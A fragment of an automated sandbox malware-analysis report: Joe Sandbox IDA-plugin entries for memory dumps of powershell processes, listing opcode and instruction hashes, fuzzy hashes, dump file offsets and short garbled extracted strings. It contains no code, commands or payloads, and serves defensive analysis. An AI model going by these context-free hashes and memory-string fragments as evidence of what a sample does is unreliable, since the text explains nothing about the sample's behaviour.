                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b7d30010225af3c9b252e850690a87eb6f4297156521f5ad72be3068bfdb69b5
                                                                                                                  • Instruction ID: 3b46eba868836425171d32ee8d81e95f496e8f78894179c3e6416aa245c3060b
                                                                                                                  • Opcode Fuzzy Hash: b7d30010225af3c9b252e850690a87eb6f4297156521f5ad72be3068bfdb69b5
                                                                                                                  • Instruction Fuzzy Hash: 6DF0A772700214AFEB149A6AE84496FB7EAEBC8671B00052DE10AC3740DF31AC4187A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80d0de398b24412d7a0fbfc746c627f95e8f66c8e46f49b8cf3b201929bc9de2
                                                                                                                  • Instruction ID: ca14c95a479c82ccc25fde1c2d52aac4ad05077974489f82ff7f8ec27e557765
                                                                                                                  • Opcode Fuzzy Hash: 80d0de398b24412d7a0fbfc746c627f95e8f66c8e46f49b8cf3b201929bc9de2
                                                                                                                  • Instruction Fuzzy Hash: 6CF082B12002456FD714A629D9409AAB79AEFC1354B508ABED6098B714DE71FC05CBE4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5bb1d6c2e4112619569703b2ac511a143f7f0928ff6bb68ad215bf5024e26a9a
                                                                                                                  • Instruction ID: 2dca9c94da69373c2e66c01afa67baac5e782f168e6becd576b5bdf71b3af0cf
                                                                                                                  • Opcode Fuzzy Hash: 5bb1d6c2e4112619569703b2ac511a143f7f0928ff6bb68ad215bf5024e26a9a
                                                                                                                  • Instruction Fuzzy Hash: D9F08C797146408FD7118F2CD4948B6BBF6AFDA21532940DAE088DB732CA61EC11CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f85159903cb3d15b9c2c39344e6398a5826b05612412b1620291b77ce975225e
                                                                                                                  • Instruction ID: 87c2285eacc9abd1339917e8e37dfb6e27002dcd674e39828f3faed9477e24f4
                                                                                                                  • Opcode Fuzzy Hash: f85159903cb3d15b9c2c39344e6398a5826b05612412b1620291b77ce975225e
                                                                                                                  • Instruction Fuzzy Hash: 11F06CB97001148FDF10DBADD94065A77E7EBCC751715419AE909DB324DB35DC028BD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c01a23e3a2dc82d93096cbae0953f58174f245622fa4a3cf1b65174ae9e0a434
                                                                                                                  • Instruction ID: 1d4d875df1ef806fde65e02f105cdd6ff691a5e8db9e3d1212f85eb0ead2ea30
                                                                                                                  • Opcode Fuzzy Hash: c01a23e3a2dc82d93096cbae0953f58174f245622fa4a3cf1b65174ae9e0a434
                                                                                                                  • Instruction Fuzzy Hash: 61F0E2B56041085BE704BB69C0147EBB796DBC1314F10816EC90957385DE756C018BD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 72b67b97354c664b221dd0feef22679fda46bb82e2d1bfe2d7075f8b09889f9f
                                                                                                                  • Instruction ID: 627f66c3c5f94b9db314bf85bf16e7f38538c5e88afc1a4d1f2d870860d609fe
                                                                                                                  • Opcode Fuzzy Hash: 72b67b97354c664b221dd0feef22679fda46bb82e2d1bfe2d7075f8b09889f9f
                                                                                                                  • Instruction Fuzzy Hash: 92F082709043145BD7609F78D4993DA7BD5EB45310F40486ADD5DC7340DB3968808B91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44598f670d4c0e1f374fab0e193a767d102cfe01f963b8b1194b62cd7d78022e
                                                                                                                  • Instruction ID: 19ee2f9434163622fd6b029c394f909fb53ff308141599d9edab02d3500713c1
                                                                                                                  • Opcode Fuzzy Hash: 44598f670d4c0e1f374fab0e193a767d102cfe01f963b8b1194b62cd7d78022e
                                                                                                                  • Instruction Fuzzy Hash: D7E065757005008F97109B1DD488C66B7FAEFDE72532900AAF549CB330CA21EC01CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6bedb20bbcc82bc2a83405aa049380078ab5fb5c978b9eba59bf32e86fb74fdb
                                                                                                                  • Instruction ID: fe50b3b04632862d342c413e22ffbb0df859f3f160a374390028d56e4b174093
                                                                                                                  • Opcode Fuzzy Hash: 6bedb20bbcc82bc2a83405aa049380078ab5fb5c978b9eba59bf32e86fb74fdb
                                                                                                                  • Instruction Fuzzy Hash: 03E020727006001B8959A25E9C4087FFBCFDEC42A0354487EC61E87B20DE706D8587F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9c8ddf0225a79e20c726db835a301f110ff9cac1d206f7e96e36ef3742d5ddb8
                                                                                                                  • Instruction ID: e9754363004bb1c6fe89bdde055b4f6f78f343f44f0e932d2c117db4165ad69b
                                                                                                                  • Opcode Fuzzy Hash: 9c8ddf0225a79e20c726db835a301f110ff9cac1d206f7e96e36ef3742d5ddb8
                                                                                                                  • Instruction Fuzzy Hash: 6DE0869770551917BE6465B925502BB458B4FC4156F1A007F8E08C7743EC14ED1253E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a938ac04795207807cecf495aef44c6e3e770a96153fe3ac8e160408d918ec6d
                                                                                                                  • Instruction ID: 26e3cfbdc9ee2194aafaf49f07e9f41e9d99a43767ee1e05dae1cf9e1a70c307
                                                                                                                  • Opcode Fuzzy Hash: a938ac04795207807cecf495aef44c6e3e770a96153fe3ac8e160408d918ec6d
                                                                                                                  • Instruction Fuzzy Hash: C7F06D709003145BD7609F78D89C39BBBE5FB44310F004869DA1EC7340DB3968808B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1e493060be87dce59b70441eb7b0b35b9bed2e5962f8028da623e902b5a71cb2
                                                                                                                  • Instruction ID: 5cf61b08e61ae47ef4cdac7f5e96d5e11817571016934c6f9885955c54e9d259
                                                                                                                  • Opcode Fuzzy Hash: 1e493060be87dce59b70441eb7b0b35b9bed2e5962f8028da623e902b5a71cb2
                                                                                                                  • Instruction Fuzzy Hash: 79E01AB6D042199ECB80DFB899412EAFBF0EB49210B1082AFD818D7701E6325A069BD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fpq$`Qkq$`Qkq$tPkq$$kq$$kq$$kq$$kq$$kq
                                                                                                                  • API String ID: 0-3516476561
                                                                                                                  • Opcode ID: ff28ee7a31ea43b6cb9e402a1e5f265bf0cfb2ce4c0e4e5dae48efedbfde8f4b
                                                                                                                  • Instruction ID: 162eb62d6f9ce75ec166d26de7b17eb92007382925f4b8447ecded00078fe814
                                                                                                                  • Opcode Fuzzy Hash: ff28ee7a31ea43b6cb9e402a1e5f265bf0cfb2ce4c0e4e5dae48efedbfde8f4b
                                                                                                                  • Instruction Fuzzy Hash: 1C61BE30A04329DFEBA4CE04CA4CBEAB7F2BB45345F15906DE8019B291C775DD94CBA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$piIk$piIk$piIk$piIk$piIk$|,Kk
                                                                                                                  • API String ID: 0-213803962
                                                                                                                  • Opcode ID: 46b34c814d4ef5622d663001825be686273a9d2d0569eeab79b4f52061405343
                                                                                                                  • Instruction ID: b529897b1cff5d11d94dba351dd1b3de8dabf969596c4c3a2437a5c534e2d327
                                                                                                                  • Opcode Fuzzy Hash: 46b34c814d4ef5622d663001825be686273a9d2d0569eeab79b4f52061405343
                                                                                                                  • Instruction Fuzzy Hash: E3B14731F00329DFDB608F6885086AA7BF1AF84314F14847AD685CB251DB35CA85CBA2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$$kq$$kq$$kq$wl$wl
                                                                                                                  • API String ID: 0-1484100296
                                                                                                                  • Opcode ID: 3e934084f567c83002fe4b6c101e096fb86c4b084a6ac4f2474ef53da90d7960
                                                                                                                  • Instruction ID: 96f697cbaa0446209e0f2ace56fcee338e01b22ebcce9890915953c916766137
                                                                                                                  • Opcode Fuzzy Hash: 3e934084f567c83002fe4b6c101e096fb86c4b084a6ac4f2474ef53da90d7960
                                                                                                                  • Instruction Fuzzy Hash: 27516A31B043A5DFDB745A298808AA7BBE6AFC1615F24847BD405CB3D1DA36C845C791
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$p5qk$tPkq$tPkq
                                                                                                                  • API String ID: 0-491562915
                                                                                                                  • Opcode ID: 4aea8fd5f4f7e2730a9934d303e2f7d19f237ed87f06f3d3e2ef1d6a520f17a3
                                                                                                                  • Instruction ID: 6294ace6f0c41dccd9817e58e8b2f22764114f9ecc4c62b02f55e64473b2cc8d
                                                                                                                  • Opcode Fuzzy Hash: 4aea8fd5f4f7e2730a9934d303e2f7d19f237ed87f06f3d3e2ef1d6a520f17a3
                                                                                                                  • Instruction Fuzzy Hash: 24C13731F043A59FD7618B688909BAABBF2AFC5314F14C4BAD515CB351DA32C846C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                  • API String ID: 0-1293621312
                                                                                                                  • Opcode ID: e961d4ec62d2bef852e3013b467e3dc0ea3fe2e33e021de37de4e5cfa81f7074
                                                                                                                  • Instruction ID: ffc72ff12d2df5f1fc551c2b6fc711cca116e867da3cd440fc0b3e46d0931e40
                                                                                                                  • Opcode Fuzzy Hash: e961d4ec62d2bef852e3013b467e3dc0ea3fe2e33e021de37de4e5cfa81f7074
                                                                                                                  • Instruction Fuzzy Hash: 5AA13931F043258FC7A48B6885086BBBBE2AFD5218B64887AD505CF751DB32C945C7D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$tPkq$tPkq
                                                                                                                  • API String ID: 0-4290159910
                                                                                                                  • Opcode ID: a50cc1547b8a2914dabb040368864830c1b71f72755e150716e91277bdfab57a
                                                                                                                  • Instruction ID: 1c3e29f862895c482ee0ed196ff63701c858031219abf7e01a1d22e39a0cc933
                                                                                                                  • Opcode Fuzzy Hash: a50cc1547b8a2914dabb040368864830c1b71f72755e150716e91277bdfab57a
                                                                                                                  • Instruction Fuzzy Hash: 9D816831F043658FC7618B6984186ABFBB2AFC5314F2884BFC551CB252DB32C949CBA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq$`lq$`lq$`lq
                                                                                                                  • API String ID: 0-2331155588
                                                                                                                  • Opcode ID: be08d4f419ecca398a3d4223f285b472ebb0cff5ce2f246db30f45f5f986327d
                                                                                                                  • Instruction ID: 19dff2598fc93909da5eb248e20e989f7af120fbb47d90a293cfb333116751c7
                                                                                                                  • Opcode Fuzzy Hash: be08d4f419ecca398a3d4223f285b472ebb0cff5ce2f246db30f45f5f986327d
                                                                                                                  • Instruction Fuzzy Hash: 5CB19574E002099FDB54DFA9D980A9EFBF2FF88300F10862AD419AB755DB34A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq$`lq$`lq$`lq
                                                                                                                  • API String ID: 0-2331155588
                                                                                                                  • Opcode ID: 0e6fee74545d154d26024e454d0d6b9f477e6c24b6ae8efe912c86aa2e9a3bb8
                                                                                                                  • Instruction ID: 242641c05765d359cc1101d6b7168b31066211fff3c0e592c6f9e09fbee02283
                                                                                                                  • Opcode Fuzzy Hash: 0e6fee74545d154d26024e454d0d6b9f477e6c24b6ae8efe912c86aa2e9a3bb8
                                                                                                                  • Instruction Fuzzy Hash: AEB17474E002099FDB54DFA9D580A9EFBF2FF88304F10862AD419AB755DB34A945CF90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                  • API String ID: 0-2881790790
                                                                                                                  • Opcode ID: 49dc1c6788a95dfa0562af1bd14d015ddff8a741a1d1fb418d54c5c2abf9e6c7
                                                                                                                  • Instruction ID: 581579ab37250b0a0fbd8b2908d7e2b425b8dcb7b7982b47e38267dc9c0d3999
                                                                                                                  • Opcode Fuzzy Hash: 49dc1c6788a95dfa0562af1bd14d015ddff8a741a1d1fb418d54c5c2abf9e6c7
                                                                                                                  • Instruction Fuzzy Hash: 33216B32720325ABDBB4692ADC05767BBDB9BC0719F24983AA505CB3C1DD79D841C361
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$$kq$$kq
                                                                                                                  • API String ID: 0-1727931526
                                                                                                                  • Opcode ID: c5228c19837c6b940d799845e9b9ec8db8322e4d3cd83ff37785c084c50197f8
                                                                                                                  • Instruction ID: 50d43b834afe2191974abceaf7a588364dc6781be93c488b3d0306735c588a61
                                                                                                                  • Opcode Fuzzy Hash: c5228c19837c6b940d799845e9b9ec8db8322e4d3cd83ff37785c084c50197f8
                                                                                                                  • Instruction Fuzzy Hash: 55112B11F0E3E94FC77B563828285662FF25F8359032A04EBD141CB392C9294C4DC3A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: {Yuo^$Yuo^
                                                                                                                  • API String ID: 0-1799386297
                                                                                                                  • Opcode ID: 847893e7c81b0d9232757cd723f5448218804101e5b16a72defa2ec1ecde51c2
                                                                                                                  • Instruction ID: b0b7608f486554331084ff314eb69f667fc3f70c9031a8084aaf004608e0f4a0
                                                                                                                  • Opcode Fuzzy Hash: 847893e7c81b0d9232757cd723f5448218804101e5b16a72defa2ec1ecde51c2
                                                                                                                  • Instruction Fuzzy Hash: 1C917FB4B007585FDB29EFB4895056EBBE7EF84600B008A2DD156EB358DF38AD058BC5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (oq
                                                                                                                  • API String ID: 0-3175707579
                                                                                                                  • Opcode ID: e0762987fe36ff9aee35e80f2411a5e263eb8d17c6a70f413e7cae594fec3dfb
                                                                                                                  • Instruction ID: e6f82cb0addc1ef1238b41c5ab2630035738ae024278c0a9f20aa2c9987c5025
                                                                                                                  • Opcode Fuzzy Hash: e0762987fe36ff9aee35e80f2411a5e263eb8d17c6a70f413e7cae594fec3dfb
                                                                                                                  • Instruction Fuzzy Hash: 3D417F34B046048FCB18DF68C898AAEBBF5EF8D315F198099E406AB395CB35DD41CB60
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (&kq
                                                                                                                  • API String ID: 0-3641282905
                                                                                                                  • Opcode ID: b10f2edee16a83af3bb63d36628646c7f4e0bc14cd0450c533f1536cfd96ff24
                                                                                                                  • Instruction ID: ae5f2f7707bf9fa88918e8d5378ae7538d1be69306ddb664a12228c51ca52642
                                                                                                                  • Opcode Fuzzy Hash: b10f2edee16a83af3bb63d36628646c7f4e0bc14cd0450c533f1536cfd96ff24
                                                                                                                  • Instruction Fuzzy Hash: 22219C75A042588FCB14DFAED84479EFFF5EF88320F24842AD419E7340CB7999058BA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 066045a2bfb3fe11f96c4edc2abdd83b9ef7e2935f3b1c8a0d82efa781d25160
                                                                                                                  • Instruction ID: 0bbcd0cd30b81a1ecd2e0a55e36f0c78e0b2f48a4803a3788bfc52ca215cc16d
                                                                                                                  • Opcode Fuzzy Hash: 066045a2bfb3fe11f96c4edc2abdd83b9ef7e2935f3b1c8a0d82efa781d25160
                                                                                                                  • Instruction Fuzzy Hash: F721F475508200EFCB05DF14E9C0B26BFA5FB8C314F28C5A9E9094A356CB3AD457CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c06f9a3e054df1367c2896c433c0b6ca380206e1d26a943748c04b061489ca7
                                                                                                                  • Instruction ID: 9e4ac7debc7f908c365063bd89ea31001ff1453fd52ddfc753316cf2e6aa114d
                                                                                                                  • Opcode Fuzzy Hash: 0c06f9a3e054df1367c2896c433c0b6ca380206e1d26a943748c04b061489ca7
                                                                                                                  • Instruction Fuzzy Hash: F1210475604244DFCB14DF24D9C4B26BFA6EB88324F24C6ADD90A4B356C37AD447CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9863ff19881efd8dfde95251b8f1176154278d0af634b7b7b201a5ba6fd81531
                                                                                                                  • Instruction ID: e1814fbb3cbb993603564cf7ee242b4fa2ed61f6fe4cc51892183211ec80d2af
                                                                                                                  • Opcode Fuzzy Hash: 9863ff19881efd8dfde95251b8f1176154278d0af634b7b7b201a5ba6fd81531
                                                                                                                  • Instruction Fuzzy Hash: 34217AB49017448FDB60CF6AC48838AFBF6EF89320F28C45ED95D9B249C774A4818B65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1adb5dd4d11c03621dcc7113220db22d41244614bdae20945214705ec1eefc8f
                                                                                                                  • Instruction ID: bdf3da06f1a38859525ea259928f8fc8d84985f9530214eb7fc3cdc75dc618de
                                                                                                                  • Opcode Fuzzy Hash: 1adb5dd4d11c03621dcc7113220db22d41244614bdae20945214705ec1eefc8f
                                                                                                                  • Instruction Fuzzy Hash: C611FE397001188FCF14DBA8D9409DE77F6EBCC325B1540A5E909EB325DB35DD158B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                  • Instruction ID: b05fa8b1723afe8cfccc81df5b0048050365f83034ca8e2ab2c289a45851266b
                                                                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                  • Instruction Fuzzy Hash: 0B219D76504240DFCF06CF10D9C4B16BF72FB88314F28C5A9D9494A756C73AD46ACB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1727714169.0000000003360000.00000040.00000800.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_3360000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f6dda0d87df92d4e467755c215d73887c600dbb53f81ef2c584876aa1ea52ed8
                                                                                                                  • Instruction ID: 3249604784cf0a272d66c9f24dbada5a7e48a5cbe39c54ad7b4000c2d4f84d8e
                                                                                                                  • Opcode Fuzzy Hash: f6dda0d87df92d4e467755c215d73887c600dbb53f81ef2c584876aa1ea52ed8
                                                                                                                  • Instruction Fuzzy Hash: 52112535B04188EFCB01DB75E8954ECBFB9EF89220B0880BBD405D7A16DA319819CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1726552453.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                  • Instruction ID: 93bd53f00400f3339e78849befd025dd67609478252da4cd0a0fb3c5264d50ff
                                                                                                                  • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                  • Instruction Fuzzy Hash: 0B118B75504280DFDB15CF14D5C4B15BFA2FB88228F28C6AAD8494B756C33AD44ACB62
                                                                                                                  Memory Dump Source
